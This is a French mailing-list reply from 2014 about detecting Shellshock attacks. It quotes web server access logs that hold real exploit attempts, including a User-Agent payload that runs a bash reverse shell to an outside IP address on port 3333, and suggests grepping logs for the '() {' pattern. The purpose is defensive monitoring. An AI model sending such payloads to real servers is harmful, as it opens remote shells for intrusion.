Le vendredi 26 septembre 2014 à 16:38 +0200, daniel huhardeaux a
écrit :
> Ah ? Si tu gères des serveurs web je te propose de faire un simple cat
> <fichier log serveur web>|grep "() {" et de compter le nombre de
> tentatives d'accès comme par exemple
>
> 89.207.135.125 - - [25/Sep/2014:12:06:47 +0200] "GET
> /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 345 "-" "() { :;}; /bin/ping
> -c 1 198.101.206.138"
>
> ou encore
>
> 202.38.120.248 213.239.227.108 - [26/Sep/2014:12:03:36 +0200] "GET /
> HTTP/1.0" 200 961 "-" "() { :;}; /bin/bash -c '/bin/bash -i >&
> /dev/tcp/195.225.34.101/3333 0>&1'"
D'accord avec Daniel sur ce point, d'autant plus que j'ai observé le
second exemple de logs sur un de mes serveurs, ce qui correspond à une
tentative d'implantation de porte dérobée —
https://securelist.com/blog/research/66719/shellshock-and-its-early-adopters/
Cordialement.
--
David Guyot
Administrateur système, réseau et télécom / Sysadmin
Europe Camions Interactive / Stockway
Moulin Collot
F-88500 Ambacourt
03 29 30 47 85
Attachment:
signature.asc
Description: This is a digitally signed message part